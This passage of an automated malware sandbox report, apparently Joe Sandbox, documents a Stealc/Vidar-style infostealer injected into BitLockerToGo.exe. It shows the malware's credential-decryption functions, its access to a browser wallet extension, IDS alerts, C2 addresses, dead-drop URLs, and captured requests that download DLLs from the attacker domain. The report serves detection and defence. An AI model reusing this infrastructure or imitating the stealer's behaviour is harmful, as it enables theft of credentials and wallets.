Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe; Code function: 3_2_6C6D25B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,3_2_6C6D25B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe; Code function: 3_2_6C668670 PK11_ExportEncryptedPrivKeyInfo,3_2_6C668670
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe; Code function: 3_2_6C68A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,3_2_6C68A650
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe; Code function: 3_2_6C66E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,3_2_6C66E6E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe; Code function: 3_2_6C6AA730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,3_2_6C6AA730
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6B0180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,3_2_6C6B0180
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6843B0 PK11_PubEncryptPKCS1,PR_SetError,3_2_6C6843B0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6A7C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,3_2_6C6A7C00
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C667D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,3_2_6C667D60
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6ABD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,3_2_6C6ABD30
                        Source: S0FTWARE.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
                        Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:50011 version: TLS 1.0
                        Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.5:49704 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:49707 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49829 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 116.203.0.159:443 -> 192.168.2.5:49836 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.5:49913 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.5:50137 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 3.5.30.241:443 -> 192.168.2.5:50138 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 51.105.71.136:443 -> 192.168.2.5:50155 version: TLS 1.2
                        Source: S0FTWARE.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                        Source: Binary string: mozglue.pdbP source: BitLockerToGo.exe, 00000003.00000002.3382859208.000000006F8DD000.00000002.00000001.01000000.00000013.sdmp, BitLockerToGo.exe, 00000003.00000002.3367821506.0000000023F61000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: freebl3.pdb source: BitLockerToGo.exe, 00000003.00000002.3364939118.000000001DFF6000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: freebl3.pdbp source: BitLockerToGo.exe, 00000003.00000002.3364939118.000000001DFF6000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: nss3.pdb@ source: BitLockerToGo.exe, 00000003.00000002.3376990744.000000003BD2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
                        Source: Binary string: BitLockerToGo.pdb source: S0FTWARE.exe, 00000000.00000002.2242921904.0000000012CB6000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: BitLockerToGo.exe, 00000003.00000002.3374753902.0000000035DB4000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: BitLockerToGo.exe, 00000003.00000002.3370381452.0000000029ED5000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: nss3.pdb source: BitLockerToGo.exe, 00000003.00000002.3376990744.000000003BD2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
                        Source: Binary string: mozglue.pdb source: BitLockerToGo.exe, 00000003.00000002.3382859208.000000006F8DD000.00000002.00000001.01000000.00000013.sdmp, BitLockerToGo.exe, 00000003.00000002.3367821506.0000000023F61000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: BitLockerToGo.exe, 00000003.00000002.3361275662.0000000017C66000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3363909845.000000001DBD8000.00000002.00001000.00020000.00000000.sdmp
                        Source: Binary string: BitLockerToGo.pdbGCTL source: S0FTWARE.exe, 00000000.00000002.2242921904.0000000012CB6000.00000004.00001000.00020000.00000000.sdmp
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A16A05 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcat,strtok_s,strtok_s,_memset,lstrcat,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,3_2_02A16A05
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A17178 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,3_2_02A17178
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A0A941 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,_memset,lstrcat,lstrcat,lstrcat,CopyFileA,_memset,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_02A0A941
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A0CE96 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,3_2_02A0CE96
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A0E5B9 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_02A0E5B9
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A18D90 SHGetFolderPathA,wsprintfA,FindFirstFileA,_mbscmp,_mbscmp,_mbscmp,_splitpath,_ismbcupper,wsprintfA,SHFileOperation,FindNextFileA,FindClose,3_2_02A18D90
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A17D20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_02A17D20
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A0C528 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,3_2_02A0C528
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A01D70 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_02A01D70
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A0C888 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_02A0C888
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A1785A GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,3_2_02A1785A
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A0DD2A wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,3_2_02A0DD2A
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A16E7F GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen,3_2_02A16E7F
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr fs:[00000030h]3_2_02A0149D
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov dword ptr [ebp-04h], eax3_2_02A0149D
                        Source: chrome.exeMemory has grown: Private usage: 1MB later: 39MB

                        Networking

                        Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.5:49875 -> 116.203.0.159:443
                        Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 116.203.0.159:443 -> 192.168.2.5:49875
                        Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 116.203.0.159:443 -> 192.168.2.5:49864
                        Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199801589826
                        Source: Malware configuration extractorURLs: https://t.me/m07mbk
                        Source: DNS query: fuare.xyz
                        Source: global trafficHTTP traffic detected: GET /m07mbk HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /OneCollector/1.0/ HTTP/1.1Accept: */*APIKey: cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521AuthMsaDeviceTicket: t=GwAWAbuEBAAU2qcZHJoKGNizGOeyqM4OaIoSZ0MOZgAAENhIsZk1icdmK4NNtUk6KLPgAMvy17Udgd1MlHE7GXRAxu9wDd84HaOk1nGIMKru6radFnZDfu7zWhcmz9j72MdI/lM5JykN5JyMCsrKKjhnWsxMrSmUTHFAm4lCtsR/4kXJ5OVGBubVm1qKlLaqfTPe4/QIS6EsPZhp2A+GbXPmd9v7KWe0y9ZBVkGnVgT2XAL69MHD65Z2sZ/bvdyK2Z9GRgl5dhajOwb9unLzQz2LihgZzhVMiIEIlP0Ox0qtNEB072yB6rGFSpbQMfXp3Qm9wrLMHPG0cNIMKQ3+lgA3sY/VTGnPGJVnsHSsfW8D9dyBIAE=&p=Client-Id: NO_AUTHContent-Encoding: deflateContent-Type: application/bond-compact-binaryExpect: 100-continueSDK-Version: EVT-Windows-C++-No-3.4.15.1Upload-Time: 1731594585346Host: self.events.data.microsoft.comContent-Length: 7972Connection: Keep-AliveCache-Control: no-cache
                        Source: Joe Sandbox ViewIP Address: 18.245.60.72 18.245.60.72
                        Source: Joe Sandbox ViewIP Address: 13.107.246.45 13.107.246.45
                        Source: Joe Sandbox ViewIP Address: 20.125.209.212 20.125.209.212
                        Source: Joe Sandbox ViewIP Address: 162.159.61.3 162.159.61.3
                        Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
                        Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                        Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50155 -> 51.105.71.136:443
                        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:50137 -> 185.166.143.49:443
                        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:50140 -> 185.166.143.49:443
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                        Source: unknownTCP traffic detected without corresponding DNS query: 65.52.241.40
                        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.57
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A06AE1 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,_memmove,lstrlen,lstrlen,_memmove,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,3_2_02A06AE1
                        Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=OKvleD1bOO+N2GM&MD=X99kat3G HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                        Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global traffic
                        HTTP traffic detected: GET /m07mbk HTTP/1.1
                        Host: t.me
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Source: global traffic
                        HTTP traffic detected: GET / HTTP/1.1
                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                        Host: fuare.xyz
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global traffic
                        HTTP traffic detected:
                            GET /sqlo.dll HTTP/1.1
                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                            Host: fuare.xyz
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                        Source: global traffic
                        HTTP traffic detected:
                            GET /freebl3.dll HTTP/1.1
                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                            Host: fuare.xyz
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1731594383155&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=dd33d61a7826467984fdc77d7a858fcd&activityId=dd33d61a7826467984fdc77d7a858fcd&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=30E4D63EBE466C3F34FBC309BFE76DD6; _EDGE_S=F=1&SID=3565577F2E976350116642482FC062E4; _EDGE_V=1
                        Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/BB1msB1P.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
